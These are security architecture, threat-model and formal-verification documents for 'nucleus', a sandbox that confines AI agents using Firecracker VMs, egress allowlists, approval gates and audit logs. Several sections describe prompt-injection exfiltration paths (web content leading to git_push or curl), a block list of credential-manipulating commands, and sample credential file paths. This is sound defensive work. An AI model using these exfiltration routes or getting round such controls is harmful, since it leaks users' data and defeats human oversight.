JWT-SVID only, with an algorithm allowlist (RS256/384/512, ES256/384, PS256/384/512). EdDSA/Ed25519 and none are out of spec for JWT-SVID and rejected; ES512/P-521 is spec-eligible but rejected because the pinned jsonwebtoken backend lacks P-521 (a dependency gap, fail-closed, not a security choice).
Anti-rollback hardening beyond the spec — the spec only SHOULD compare spiffe_sequence; nucleus makes it a MUST: a fetched bundle whose sequence is not strictly greater than the last accepted is rejected, and the current good key set is kept (fail-safe — never blanked on a fetch error or rollback). This closes a key-rollback attack, which is exactly the failure-domain-diversity property at the identity layer.

2.5 Record which domains federate, auditably

nucleus-trust-registry is a PR-rooted, GitHub-OIDC-attested, transparency-logged SPIFFE federation-enrollment registry. It records which trust domains you federate with, who attested each, and produces a deterministic federation set that feeds the §2.4 validator (FederationStore), plus an append-only, witness-cosigned transparency log of every binding.

For the solo operator, the immediate real use is enrolling your own domains (prod/staging/edge/ci). Repo layout:

registry/
  .github/CODEOWNERS                 # path-scoped per-domain ownership
  domains/
    <trust-domain>/
      bundle.json     # SPIFFE bundle = JWK Set + spiffe_sequence
      metadata.toml   # trust_domain, owner_github_org, owner_id (numeric),
                      # bundle_endpoint_url, profile = "https_web"

Enrollment is a pull request; the verifier binary runs as a fail-closed gate, compiles the set, and seals the log:

nucleus-trust-registry verify-pr   # fail-closed PR enrollment gate
nucleus-trust-registry compile     # deterministic federation set
nucleus-trust-registry log-append  # append binding + seal cosigned STH

(The OIDC token request is enroller-side workflow config in .github/workflows/trust-registry.yml; the binary is the verifier.)

2.6 Verify with the in-browser WASM verifier (trust no server)

nucleus-verifier-wasm ships the same Rust verifier compiled to WASM, so anyone — including you — can verify a bundle in the browser or Node without trusting any hosted service, network path, or operator. A hosted verifier service is convenience; this is the trust root.

import init, { verifyBundle } from "@coproduct/nucleus-verifier-wasm";

await init();                                   // once per page
const bundle = await fetch("/your-bundle.json").then(r => r.text());
const trustAnchor = JSON.stringify({
  trust_jwks: { keys: [/* your OUT-OF-BAND JWKS — never the bundle's */] },
  // Optional knobs (real fields):
  // trusted_witnesses_hex: ["<witness-A-hex>", "<witness-B-hex>", "..."],
  // cosignature_threshold: 2,        // enforce your k-of-n at verify time
  // require_payload_binding: true,
});
const report = verifyBundle(bundle, trustAnchor);   // throws on failure

Note the trusted_witnesses_hex + cosignature_threshold knobs: this is where your k-of-n quorum (§2.2) is enforced at the point of verification — the verifier rejects a bundle that lacks a threshold of cosignatures from witnesses you trust.

There is a self-contained in-browser tamper demo (demo.html) that verifies a real execution-lineage bundle entirely client-side, then lets you corrupt it and watch the local verifier reject it. To prove there is no server round-trip, you can toggle DevTools → Offline and it still works:

cargo run -p nucleus-envelope --example emit_demo_bundle   # real fixtures
wasm-pack build sdks/verifier-js --target web --release    # build WASM
python3 -m http.server -d sdks/verifier-js 8000            # serve
# -> http://localhost:8000/demo.html

3. Honest framing (read this before you pitch it)

These caveats are not fine print — they are the difference between a credible system and an overclaim. Each is enforced or documented in the shipped code.

Value = failure-domain diversity, NOT other organizations. A quorum of your own witnesses across regions/clouds/key-stores already gives you the un-rollback property with zero counterparties. Federating with other orgs is additive, never required. Do not sell the network effect as a prerequisite.
fetched != trusted (transport integrity ⊥ provenance). A perfect BLAKE3 hash match guarantees you got exactly the bytes the publisher served — it says nothing about who produced them or whether they are policy-valid. A hash-perfect fetch can still FAIL nucleus_envelope::verify_bundle (e.g. forged/unknown issuer). You must always run verify_bundle with an out-of-band trust anchor. This is why nucleus bundle fetch makes --trust-anchor mandatory.
A BLAKE3 transport hash is not a CID and is distinct from the envelope’s SHA-256 canonical hash. Don’t conflate them or treat the transport id as IPLD/IPFS-interoperable.
The system is non-custodial — a registry + verifier, NOT a CA. The trust registry records, distributes, and verifies trust-domain → JWK-Set bindings. It is never a certificate authority and never holds a private key: it does not mint keys, sign on behalf of enrolled domains, or hold any private material. Each domain runs its own SPIFFE authority; the registry only pins the public JWK Set that domain publishes.
OIDC proves GitHub-ORG control, not trust-domain ownership. The registry’s GitHub Actions OIDC proof-of-control proves the enrolling PR ran in a repo owned by the GitHub org whose numeric owner_id is pinned (the numeric pin defeats org-rename squatting). It does not prove you own the SPIFFE trust-domain name. A DNS-01-style trust-domain proof is a v2 item.
Auditable ≠ un-backdoorable, and the MVP registry trust base is thin. The transparency log makes a misbehaving maintainer detectable, not impossible: a binding counts only if its leaf is in a witness-cosigned Signed Tree Head, so an out-of-band insertion that never entered the cosigned log is rejected and bundle tampering breaks the inclusion proof — but a maintainer colluding with the witness can still enroll a binding. The MVP registry trust base is a single maintainer + single witness; there is no threshold signing or key ceremony there yet (adding witnesses is a drop-in). This is separate from the §2.1–2.2 log witnesses, which you should already run k-of-n.
Integrity-axis verification scope (the theorem). The merged Lean noninterference theorem is proven over the Aeneas-extracted enforcement core (extracted from the real Rust in crates/portcullis-core/src/extracted/ifc_integrity.rs) and its #print axioms audit is [propext, Classical.choice, Quot.sound] — no sorryAx, no opaque external axiom. But its scope is the integrity axis (Biba “no read-down / no write-up” for integrity), not confidentiality, and it bounds the enforcement model. The WASM verifier proves lineage is tamper-evident (hash chain + Merkle inclusion) and authentic (signed/cosigned by keys in your trust anchor). Neither proves the agent behaved well, that confidentiality held, or that any computation was correct — those are separate guarantees. Do not claim end-to-end correctness.
A metered tier exists only as a dormant seam — there is no payment today. A valid cosignature (witness), a verified-byte fetch (bundle-cas), and a cross-domain validation (federation) are each natural units of proven work, documented as future metering points for a possible parallel paid tier (priced by nucleus’s verified VCG/Pigou clearing, settled over x402/L402). None of that billing logic exists: no payment, no accounting, no token, no counter is wired anywhere. The seams are documented only so a future paid tier is additive, not a rewrite — and per the Tor lesson, any such tier would meter only proven work and run alongside (never tax) the volunteer commons. C2SP itself flags witness funding as an unsolved open problem; this is one possible answer, not a settled one.

4. Why this beats hand-edited SPIRE federation config or a single log

vs. a single trusted log. A lone transparency log is vulnerable to the “split-view” attack — a compromised log can present different signed tree heads to different clients and rewrite history without breaking its own consistency proofs. The standard defense (Sigstore, the C2SP witness protocol) is multiple independent witnesses that co-sign tree heads. Nucleus lets you be those witnesses across your own failure domains, and enforce a k-of-n quorum at verify time. One compromised box can no longer rewrite your history; an attacker needs a threshold compromise spanning regions/clouds/key-stores.

vs. hand-edited SPIRE federation config. Plain SPIRE federation is a set of YAML federates_with entries, hand-maintained, with the trust- domain → bundle-endpoint binding sitting in config files that nobody co-signs and nothing logs. Nucleus keeps SPIRE’s actual federation mechanism (SPIFFE bundle endpoints, the https_web profile, JWT-SVID validation — it reuses the spec, it doesn’t reinvent it) but adds three things a raw config file can’t give you:

An auditable, append-only enrollment record — every binding is a PR with GitHub-OIDC proof-of-control (numeric-owner_id pinned against rename squatting) and lands in a witness-cosigned transparency log, so a silently-added or backdated federation entry is detectable.
Spec-exceeding anti-rollback — the inbound validator makes the spiffe_sequence monotonicity check a MUST and keeps the last-good key set on any rollback or fetch error, closing a key-rollback hole the spec leaves as a SHOULD.
A deterministic, reproducible federation set — compile produces the same set from the same registry, instead of relying on whatever a human last edited into a YAML file.

The net: SPIRE gives you the plumbing; nucleus gives you the evidence that the plumbing wasn’t quietly re-wired — and it does so non-custodially, across failure domains you already control, before any second organization is involved.

Sources & references

“Come for the tool, stay for the network” — cdixon (2015)
HashiCorp Vault Seal HA / auto-unseal across regions+providers — Vault Seal concepts, Transit auto-unseal best practices
Sigstore witnesses & the log split-view attack — Sigstore security model, witnessing Sigstore
SPIRE / SPIFFE federation (bundle endpoints, single-server SPOF) — SPIRE server config, scaling SPIRE
MPC / threshold signing “no single point of failure” framing — CertiK: What is MPC, Fireblocks: MPC vs multi-sig
C2SP tlog-witness spec — c2sp.org/tlog-witness
Sigsum policy grammar — sigsum-go policy doc

Architecture Overview (25k plan)

Goals

Enforce all side effects via a policy-aware proxy inside a Firecracker VM (Firecracker driver).
Treat permission state as a static envelope around a dynamic agent.
Default network egress to deny; explicit allowlists only (host netns iptables + guest defense).
The node provisions a per-pod netns, tap interface, and guest IP; guest init configures eth0 from kernel args.
Netns setup enables bridge netfilter (br_netfilter) so iptables can enforce guest egress.
Approvals require signed tokens issued by an authority (HMAC today; external authority roadmap).
Provide verifiable audit logs for every operation (signed + verified).

Trust Boundaries

Agent / Tool Adapter
  |  (signed HTTP)
  v
Host Control Plane (nucleus-node + signed proxy)
  |  (vsock bridge, no guest TCP)
  v
Firecracker VM (nucleus-tool-proxy + enforcement runtime)
  |  (cap-std, Executor)
  v
Side effects (filesystem/commands)

Boundary 1: Agent -> Control Plane

Requests are signed (HMAC today; asymmetric is roadmap).
Control plane forwards only to the VM proxy.

Boundary 2: Control Plane -> VM

Use vsock only by default; guest NIC requires an explicit network policy and host enforcement.
Host enforcement uses nsenter + iptables inside the Firecracker netns (Linux only).
By default the guest sees only proxy traffic; optional network egress is allowlisted.

Boundary 3: VM -> Host

No host filesystem access except mounted scratch.
Rootfs is read-only; scratch is per-pod and limited.

Components

nucleus-node (host)

Pod lifecycle (Firecracker + resources).
Starts vsock bridge to the proxy.
Applies cgroups/seccomp to the VMM process.
Starts a signed proxy on 127.0.0.1.

approval authority (host, separate process, roadmap)

Issues signed approval bundles (roadmap).
Logs approvals with signatures.
Enforces replay protection and expiration.

nucleus-tool-proxy (guest)

Enforces permissions (Sandbox + Executor).
Requires approvals for gated ops (counter-based today; signed requests required; bundles are roadmap).
Writes signed audit log entries (verifiable with nucleus-audit).
Guest init (Rust) configures networking from kernel args and then execs the proxy.
Guest init emits a boot report into the audit log on startup.

policy model (shared)

Capability lattice + obligations.
Normalization (nu) enforces uninhabitable state constraints.

Data Flows

Tool call

Adapter signs request (if enabled).
Signed proxy injects auth headers (if enabled).
Proxy enforces policy and executes side effect.
Audit log records action (and optional signature).

Approval

Agent requests approval.
Proxy records approval count for the operation.
Approval count is consumed for gated ops.

Non-goals (initial)

Multi-tenant scheduling across hosts.
Full UI control plane.
Zero-knowledge attestation.

Progress Snapshot (Current)

Working today

Enforced CLI path via nucleus-node (Firecracker) + MCP + nucleus-tool-proxy (read/write/run).
Runtime gating for approvals, budgets, and time windows.
Firecracker driver with default‑deny egress in a dedicated netns (Linux).
Immutable network policy drift detection (fail‑closed on iptables changes).
DNS allowlisting with pinned hostname resolution (dnsmasq in netns, Linux).
Audit logs are hash‑chained, signed, and verifiable (nucleus-audit).

Partial / in progress

Web/search tools not yet wired in enforced mode.
Approvals are runtime tokens; signed approvals are required. Preflight bundles are planned.
Kani proofs exist; nightly job runs, merge gating and formal proofs are planned.

Not yet

Remote append‑only audit storage / immutability proofs.

Invariants (current + intended)

Side effects should only happen inside nucleus-tool-proxy (host should not perform side effects).
Firecracker driver should only expose the signed proxy address to adapters.
Guest rootfs is read-only and scratch is writable when configured in the image/spec.
Network egress is denied by default for Firecracker pods when --firecracker-netns=true; if no network policy is provided, the guest has no NIC and iptables still default-denies.
Monotone security posture: permissions and isolation guarantees should only tighten (or the pod is terminated), never silently relax after creation.
- Seccomp is fixed at Firecracker spawn.
- Network policy is applied once and verified for drift (fail‑closed monitor).
- Permission states are normalized via ν and only tightened after creation.

Security Architecture

Nucleus is built with security as a foundational principle, not an afterthought. This document describes the security guarantees, defense-in-depth layers, and compliance positioning.

Executive Summary

Nucleus provides:

Memory-safe runtime (100% Rust) eliminating ~70% of security vulnerabilities
Cryptographic workload identity (SPIFFE/mTLS) instead of shared secrets
Enforced permission boundaries (not advisory configuration)
Defense-in-depth with multiple independent security layers

Regulatory alignment:

CISA Secure by Design mandate (memory-safety roadmaps required by Jan 2026)
NSA/CISA guidance on memory-safe programming languages
White House directive on memory-safe code in critical infrastructure

Memory Safety: The Foundation

Why Rust Matters

According to Microsoft, Google, and NSA research, approximately 70% of security vulnerabilities are memory safety issues:

Buffer overflows
Use-after-free
Null pointer dereferences
Double frees
Data races

Rust eliminates these vulnerability classes at compile time through its ownership system. Every line of Nucleus is written in Rust with no unsafe escape hatches in security-critical paths.

CISA Alignment

The Cybersecurity and Infrastructure Security Agency (CISA) now requires:

Memory-safety roadmaps from critical infrastructure software providers (deadline: January 1, 2026)
Adoption of memory-safe languages for new development
Elimination of memory-unsafe code in security-critical components

Nucleus is memory-safe by default, requiring no roadmap transition.

Identity: SPIFFE/mTLS

No Shared Secrets

Traditional approaches use shared secrets (API keys, tokens) that can be:

Leaked in logs
Stolen from environment variables
Intercepted in transit
Replayed by attackers

Nucleus uses SPIFFE workload identity:

spiffe://trust-domain/ns/namespace/sa/service-account

Every workload receives a cryptographic identity (X.509 SVID) that:

Cannot be forged without CA compromise
Is bound to the workload, not a human-managed secret
Enables mutual TLS (mTLS) for all service communication
Supports automatic rotation without service disruption

mTLS Everywhere

All communication between Nucleus components uses mutual TLS:

Client authenticates to server
Server authenticates to client
Traffic is encrypted
No party can impersonate another

┌─────────────────┐     mTLS      ┌─────────────────┐
│   Orchestrator  │──────────────>│   Tool Proxy    │
│                 │<──────────────│                 │
│ Client SVID     │               │ Server SVID     │
└─────────────────┘               └─────────────────┘
        │                                 │
        └───── Same Trust Domain ─────────┘
              (CA validates both)

Isolation: Defense in Depth

Nucleus implements multiple independent security layers:

Layer 1: Firecracker MicroVMs

Each agent task runs in a dedicated Firecracker microVM:

Separate kernel instance
Isolated memory space
No shared filesystem (except explicit mounts)
Hardware-enforced separation

Layer 2: Network Namespace Isolation

Each pod gets its own network namespace:

Default-deny egress
Explicit DNS allowlisting
iptables policy with drift detection (fail-closed)
No access to host network

Layer 3: Capability-Based Filesystem

File access uses cap-std for capability-based security:

No ambient authority
Must explicitly open files through capability handles
Path traversal attacks blocked at syscall level

Layer 4: Policy Enforcement (portcullis)

The permission lattice provides mathematical guarantees:

Capabilities can only tighten through composition
Dangerous combinations (uninhabitable state) trigger additional gates
No silent policy relaxation

Layer 5: Environment Isolation

Spawned processes receive only explicitly allowed environment variables:

Parent environment is cleared (env_clear())
Only allowlisted variables are passed
Prevents secret leakage from orchestrator to sandbox

The Uninhabitable State

Nucleus specifically guards against the uninhabitable state:

Private Data    +    Untrusted Content    +    Exfiltration Vector
    │                      │                         │
    ▼                      ▼                         ▼
read_files              web_fetch                 git_push
glob_search             web_search                create_pr
grep_search                                       run_bash (curl)

When all three are present at autonomous levels, Nucleus:

Detects the dangerous combination
Adds approval obligations to exfiltration operations
Requires human-in-the-loop confirmation

This prevents prompt injection attacks from silently exfiltrating sensitive data.

Input Validation

All external inputs are validated at API boundaries:

Length Limits

Input Type	Maximum Length	Rationale
Glob/Regex patterns	1,024 bytes	Prevent ReDoS
Search queries	512 bytes	Prevent resource exhaustion
File paths	4,096 bytes	Match filesystem limits
Command arguments	16,384 bytes total	Prevent shell injection
stdin content	1 MB	Prevent memory exhaustion
URLs	2,048 bytes	Match browser limits

ReDoS Protection

Regular expression patterns are scanned for catastrophic backtracking:

Nested quantifiers: (a+)+
Overlapping alternation: (a|a)+
Excessive repetition: a{1000,}

Dangerous patterns are rejected before execution.

Path Validation

All paths are:

Canonicalized to resolve symlinks and ..
Checked against sandbox boundaries
Validated against allowlist/blocklist patterns

Audit Logging

Every operation is logged with:

Timestamp (monotonic + wall clock)
Request ID (correlation)
Operation type and parameters
Outcome (success, denied, error)
Principal identity (SPIFFE ID)
Audit context (additional metadata)

What Gets Logged

Event Type	Details
Successful operations	Operation, subject, result
Policy denials	Reason, attempted operation
Validation failures	Field, error
Authentication failures	Reason, attempted identity
System errors	Error code, context

Hash-Chained Integrity

Audit logs are hash-chained using SHA-256:

Each entry includes hash of previous entry
Tampering is detectable
Gaps are detectable
Verified with nucleus-audit

Error Handling

Error messages are sanitized before returning to clients:

Internal	Sanitized
`/var/sandbox/abc123/secrets/token.txt`	`[sandbox]/secrets/token.txt`
`/home/user/.config/credentials`	`[home]/.config/credentials`
`/etc/passwd`	`[path]`

This prevents information disclosure that could aid attackers in understanding internal structure.

Approval System

Security-sensitive operations require explicit approval:

Approval Flow

Operation triggers approval requirement
Approval request generated with nonce
Human reviews and approves/denies
Approval token issued (HMAC-signed)
Token validated before operation proceeds
Token is single-use (nonce replay protection)

Token Security

HMAC-SHA256 signed
Bound to specific operation
Time-limited expiry
Nonce prevents replay
Cannot be forged without secret

Budget Enforcement

Resource usage is tracked and limited:

Cost Model

Operation	Cost Basis
Command execution	Base + per-second
File I/O	Per KB read/written
Network requests	Per request
Search operations	Per result/match

Enforcement

Budget is checked before operation starts
Reservation model prevents races
Atomic tracking for concurrent access
Operations fail cleanly when budget exhausted

Compliance Positioning

CISA Secure by Design

Requirement	Nucleus Status
Memory-safe language	Rust (100%)
Memory-safety roadmap	Not needed (already compliant)
Input validation	Comprehensive
Secure defaults	Yes

SOC 2 Alignment

Control	Implementation
Access control	SPIFFE/mTLS, capability-based
Audit logging	Hash-chained, comprehensive
Change management	Policy as code
Incident response	Fail-closed, drift detection

OWASP Top 10

Vulnerability	Mitigation
Injection	Input validation, parameterized commands
Broken auth	mTLS, no shared secrets
Sensitive data exposure	Environment isolation, error sanitization
XXE	No XML parsing in critical paths
Broken access control	Capability-based, enforced policy
Security misconfiguration	Secure defaults, drift detection
XSS	Not applicable (no web UI)
Insecure deserialization	Serde with strict schemas
Using vulnerable components	cargo-deny, security audits
Insufficient logging	Comprehensive audit trail

Security Testing

Automated

cargo-deny: License and vulnerability scanning
cargo-audit: CVE database checks
Property tests: Lattice laws, ν properties
Adversarial tests: Path traversal, command injection
mTLS tests: Certificate validation, trust boundaries

Planned

Fuzzing: Command parsing, path normalization, policy deserialization
Formal verification: Core lattice properties (Kani proofs)

Non-Goals

Nucleus does not protect against:

Threat	Reason
Host kernel compromise	Enforcement stack must be trusted
Side-channel attacks	Requires hardware mitigations
Malicious human approvals	Social engineering is out of scope
VM escape	Firecracker hardening is assumed

References

Isolation Levels and Security Model

This document describes nucleus’s isolation architecture, driver options, and security tradeoffs for different deployment scenarios.

Isolation Hierarchy

Nucleus supports multiple isolation levels depending on the deployment environment:

Level	Driver	Isolation	Boot Time	Network Control	Use Case
4	`firecracker`	Hardware VM (KVM)	~125ms	Per-pod iptables	Production, untrusted code
3	`lima` (planned)	Full VM (QEMU/vz)	~2-20s	VM-level	Development, macOS
2	`gvisor` (planned)	Syscall filtering	~ms	gVisor stack	Semi-trusted workloads
1	`local`	Process only	~ms	None	Trusted code, testing

Driver Security Properties

Firecracker Driver (Level 4) - Recommended for Production

Security boundaries:

Separate Linux kernel per pod (hardware-enforced via KVM)
Minimal attack surface (~5 virtio devices)
Read-only rootfs with scratch-only writes
Per-pod network namespace with iptables enforcement
Seccomp filtering on VMM process

Network isolation:

Default-deny egress (no NIC unless spec.network specified)
DNS allowlisting with pinned resolution
Iptables drift detection (fail-closed on policy changes)
No shared host interfaces (per-pod tap device)

Requirements:

Linux host with /dev/kvm
Apple Silicon M3/M4 + macOS 15+ (via Lima nested virtualization)
Not supported: Intel Macs, older Apple Silicon, cloud VMs without nested virt

Local Driver (Level 1) - Development Only

Security boundaries:

Process-level isolation only
Shared host kernel
Full network access (no isolation)
Uninhabitable state guard still enforces approval requirements

What’s enforced:

Command lattice (blocked commands like gh auth)
Approval obligations (uninhabitable state constraint)
Budget limits
Path restrictions (via cap-std)

What’s NOT enforced:

Network egress (dns_allow ignored)
VM-level isolation
Kernel separation

Use cases:

Local development and testing
Trusted first-party code
Validating policy logic without VM overhead

# Explicitly opt-in to local driver (unsafe for untrusted code)
nucleus-node --driver local --allow-local-driver

Lima VM as Development Environment

For macOS users without firecracker support (Intel Macs, M1/M2), Lima provides a development-grade sandbox:

Lima Security Properties

Property	Lima VM	Firecracker
Kernel isolation	Yes (separate Linux)	Yes (per-pod)
Per-pod isolation	No (shared VM)	Yes
Network control	VM-level only	Per-pod iptables
Boot time	~2-20s	~125ms
Escape difficulty	VM escape (high)	VM escape (high)

Lima Architecture

┌─────────────────────────────────────────────────────────────┐
│  macOS Host                                                  │
│  ┌────────────────────────────────────────────────────────┐ │
│  │  Lima VM (QEMU/vz)                                     │ │
│  │  ┌──────────────────────────────────────────────────┐  │ │
│  │  │  nucleus-node (local driver)                     │  │ │
│  │  │    ↓                                             │  │ │
│  │  │  nucleus-tool-proxy (per-pod process)            │  │ │
│  │  │    - Policy enforcement                          │  │ │
│  │  │    - Command lattice                             │  │ │
│  │  │    -  Uninhabitable state guard                              │  │ │
│  │  └──────────────────────────────────────────────────┘  │ │
│  │  /workspace (mounted from host)                        │ │
│  └────────────────────────────────────────────────────────┘ │
└─────────────────────────────────────────────────────────────┘

Lima Configuration

# ~/.lima/nucleus/lima.yaml
mounts:
  - location: "/path/to/workspace"
    mountPoint: "/workspace"
    writable: true

provision:
  - mode: system
    script: |
      # Install musl toolchain for static binaries
      apt-get install -y musl-tools musl-dev
      # ... (Rust setup)

Lima Limitations

No per-pod network isolation: All pods share VM’s network
No dns_allow enforcement: Network policy requires firecracker
Shared kernel attack surface: All pods share Lima’s kernel
Not suitable for untrusted code in production

NVIDIA’s Mandatory Security Controls

Based on NVIDIA’s guidance for agentic sandboxing:

1. Network Egress Controls (Firecracker only)

spec:
  network:
    dns_allow:
      - "api.github.com"
      - "github.com"
    # All other egress blocked by default

2. Workspace Write Restrictions

Nucleus enforces via:

Read-only rootfs
Scratch-only write paths
cap-std path sandboxing

3. Configuration File Protection

Command lattice blocks:

gh auth *, gh config * (credential manipulation)
Writes to .git/hooks, .claude/, etc.

Uninhabitable state Guard

Regardless of driver, nucleus enforces the uninhabitable state constraint:

When all three capabilities are present at autonomous levels:

Private data access (read_files)
Untrusted content exposure (web_fetch)
External communication (git_push, api_call)

Exfiltration operations gain approval obligations - requiring human confirmation before execution.

# Even with "permissive" profile:
$ gh pr create
{"error": "approval required", "operation": "gh pr create"}

This is defense-in-depth: even if network/VM isolation fails, the agent cannot autonomously exfiltrate data.

Platform Recommendations

Platform	Recommended Driver	Notes
Linux + KVM	`firecracker`	Full production support
M3/M4 Mac + macOS 15+	`firecracker` (via Lima)	Native KVM in nested VM
M1/M2 Mac	`local` (in Lima)	No KVM, use Lima for kernel isolation
Intel Mac	`local` (in Lima)	No KVM, Lima provides VM boundary
Cloud VM (no nested virt)	`local` or `gvisor` (planned)	Consider PVM if available

Defense-in-Depth Layers

Layer 5: Approval obligations (uninhabitable state guard)
Layer 4: Command lattice (blocked commands)
Layer 3: Path sandboxing (cap-std)
Layer 2: Network isolation (iptables/dns_allow) [firecracker only]
Layer 1: VM isolation (KVM/QEMU)
Layer 0: Host kernel

Even when lower layers are unavailable (e.g., local driver), higher layers still provide meaningful security:

Command blocking prevents gh auth login
Path sandboxing prevents writes outside workspace
Uninhabitable state guard requires approval for exfiltration

References

How to Sandbox AI Agents in 2026 - Isolation technology comparison
NVIDIA Sandboxing Guidance - Mandatory controls
Lima v2.0 for AI Workflows - Lima security features
The Uninhabitable State - Original threat model

Threat Model (25k plan)

Assets

Host filesystem and secrets.
Pod data (inputs, outputs, logs).
Approval decisions and audit trail.
Policy grants and enforcement state.

Trust Assumptions

Firecracker provides VM isolation from the host kernel.
Host kernel is not compromised.
Cryptographic primitives are implemented correctly.
Local driver is for trusted workloads only.

Adversaries

Malicious prompt injection within agent inputs.
Untrusted tool output or external content.
Compromised adapter or malformed requests.
Accidental operator misconfiguration.

Threats by Boundary

Agent -> Control Plane

Replay of tool requests.
Forged approvals.
Tool call parameter tampering.

Mitigations

Signed requests required, nonce/timestamp with max skew.
Signed approval requests require nonce + expiry; preflight bundles are roadmap.

Control Plane -> VM

VM proxy spoofing.
Traffic interception.

Mitigations

Vsock-only transport.
VM-unique secret provisioned at boot (auth secret baked into rootfs).

VM -> Host

Escapes via shared filesystem.
Excessive resource usage.

Mitigations

Read-only rootfs, scratch-only write.
Cgroup CPU/memory limits.
Seccomp on VMM.
Host netns iptables enforce default deny when --firecracker-netns=true (even without spec.network).
Netns iptables are snapshotted and monitored; drift fails closed by terminating the pod.
Node provisions per-pod netns + tap to avoid shared host interfaces.
Requires br_netfilter so bridge traffic hits iptables.

Host Signed Proxy

Threat: host-local callers bypass auth by calling the vsock bridge directly.
Mitigation: only expose the signed proxy address to adapters.

Non-goals

Side-channel resistance.
Host kernel compromise.
Zero-knowledge verification.

Acceptance Tests (25k plan)

Enforcement (current)

Any filesystem access outside sandbox root is denied (cap-std sandbox).
Any command not in allowlist (or structured rules) is denied.
Approval-gated operation fails without a recorded approval.
Approval grants expire (default TTL, enforced when auth is enabled).
Approval requests are gated by a separate approval secret and nonce.
Budget exhaustion blocks further side effects.
Time window expiry blocks execution.

Uninhabitable state (current)

When private data + untrusted content + exfil path are all enabled, approvals are required for exfil operations.

Network (current)

Host netns iptables enforces default-deny egress for Firecracker pods when --firecracker-netns=true (even without spec.network).
Host monitors iptables drift and fails closed by terminating pods on deviation.
Allowlisted egress only for IP/CIDR with optional port (no hostnames).
Guest init configures eth0 from kernel args (nucleus.net=...) when a network policy is present.
Node provisions tap + bridge inside the pod netns only when spec.network is set (guest NIC is otherwise absent).
Integration: scripts/firecracker/test-network.sh boots a VM and verifies cmdline + iptables rules.
Optional connectivity test uses nucleus-net-probe via the tool proxy (CHECK_CONNECTIVITY=1).

Audit (current)

Every tool call produces a signed audit log record (verifiable).
Audit entries are hash-chained; tampering breaks the chain.
Approval events are logged with operation name and count.
Guest init emits a boot report entry on startup.

VM Isolation (current)

Rootfs is read-only when configured in the image/spec.
Scratch is mounted when configured.
Proxy starts via init with no extra services.

Roadmap Tests

Approval tokens must be signed, bounded to op + expiry + nonce.
Audits must include cryptographic signatures and issuer identity.
Network egress should be enforced via cgroup/eBPF filters (beyond iptables).

Formal Methods Plan

Goal: move from model checking to machine-checked proofs for the core lattice and nucleus (ν) properties, while keeping the spec small and auditable.

Scope (initial)

Permission lattice order and join/meet.
Nucleus ν (normalization) laws:
- Idempotent: ν(ν(x)) = ν(x)
- Monotone: x ≤ y ⇒ ν(x) ≤ ν(y)
- Deflationary: ν(x) ≤ x
Uninhabitable state obligations as a derived constraint.

Plan

Lean 4 spec of the lattice structure and ν (small, pure model).
Proofs of ν laws + meet/join compatibility (minimal theorem set).
Traceability: map each Rust field to the spec with a short “spec ↔ code” reference table.
CI gate for proof check (separate job; fails on proof regressions).

What Kani Covers (and doesn’t)

Kani is used for bounded model checking on Rust implementations.
Kani runs as a nightly CI job; merge gating is planned once proofs stabilize.
Kani does not replace theorem proving; it complements the proof layer.

Non-goals (initial)

Full refinement proofs from Rust to Lean.
End-to-end OS isolation proofs.

Verified Claims

Machine-checked properties of the Nucleus security kernel. Each claim links to its proof, states what it guarantees and what it does not, and names the CI gate that enforces it on every pull request.

Verification stack:

Lean 4 kernel-checked proofs via Aeneas extraction (types + theorems)
Kani BMC bounded model checking of Rust implementations (159 harnesses)
Rust type system structural enforcement via sealed types and phantom tags

Tier 1: Algebraic Properties (Lean 4 + Kani BMC)

1. IFC label join is a semilattice

Plain English: When two data sources are combined (e.g., a user prompt mixed with web content), the resulting security label is always at least as restrictive as the most restrictive input. Combining data never makes it less restricted.

Formal statement: (IFCLabel, join) is a commutative, associative, idempotent semilattice with bottom as identity.

Proved in:

Lean 4: lean/IFCSemilatticeProofs.lean — ifc_join_idempotent, ifc_join_comm, ifc_join_assoc
Kani: proof_ifc_join_idempotent, proof_ifc_join_commutative, proof_ifc_join_associative (portcullis-core)

What it does NOT prove: That labels are assigned correctly at runtime. The algebra is sound; labeling depends on correct integration.

CI gate: Lean proofs run in the Aeneas (Rust -> Lean 4) CI job. Kani harnesses run in the Mutation Testing job. Both block merge on failure.

2. Taint is monotone (no silent cleansing)

Plain English: Once an AI agent has processed adversarial content (e.g., a web page with a prompt injection attempt), that contamination is permanently recorded on every output derived from it. No sequence of operations can wash it out without explicit human authorization.

Formal statement: For all derivation classes x: join(x, Deterministic) = x and join(OpaqueExternal, x) = OpaqueExternal. The session taint ceiling is monotonically non-decreasing.

Proved in:

Lean 4: lean/DerivationProofs.lean — no_silent_cleansing, join_monotone_left, join_opaque_left
Kani: proof_derivation_no_silent_cleansing, proof_derivation_join_monotone (portcullis-core)
Runtime: FlowTracker::session_taint_ceiling is only raised, never lowered (except via explicit reset_session_ceiling which requires human authority)

What it does NOT prove: That the agent will not be compromised. That prompt injection will not succeed. Only that if it does, the taint is tracked and cannot be erased silently.

CI gate: Lean + Kani in CI. The reset_session_ceiling escape hatch is audited as a security-sensitive operation (#1233).

3. Adversarial integrity is absorbing

Plain English: Mixing any data with adversarial-integrity content always produces adversarial-integrity output. There is no “dilution” — even one drop of adversarial input contaminates the entire result.

Formal statement: For all IntegLevel b: Adversarial meet b = Adversarial.

Proved in:

Lean 4: lean/IFCSemilatticeProofs.lean — integ_inf_adversarial_left, integ_inf_adversarial_right
Lean 4: invariant_exploit_propagates_taint (end-to-end IFC scenario)

What it does NOT prove: That adversarial content will be detected. Only that once labeled, the label cannot be weakened through data combination.

CI gate: Lean Aeneas job.

4. Secret confidentiality is absorbing

Plain English: Mixing any data with secret-classified content always produces secret-classified output. Combining a secret API key with public documentation does not make the result “mostly public.”

Formal statement: For all ConfLevel b: Secret sup b = Secret.

Proved in:

Lean 4: lean/IFCSemilatticeProofs.lean — conf_sup_secret_left, conf_sup_secret_right

What it does NOT prove: That secrets are labeled correctly at source. A secret not labeled as Secret will not benefit from this guarantee.

CI gate: Lean Aeneas job.

5. Capability lattice is a distributive Heyting algebra

Plain English: The permission system (which tools an agent can use) follows the mathematical rules of a Heyting algebra. This means permissions compose predictably: restricting permissions always produces a valid, less-permissive result; combining permissions always produces a valid, more-permissive result.

Formal statement: (CapabilityLattice, meet, join, implies) satisfies all Heyting algebra axioms, including the adjunction property a meet b <= c iff a <= b implies c.

Proved in:

Kani: proof_r1_heyting_adjunction, proof_r4_lattice_heyting_adjunction (portcullis)
Lean 4: lean/generated/PortcullisCore/Types.lean — type generation from Aeneas

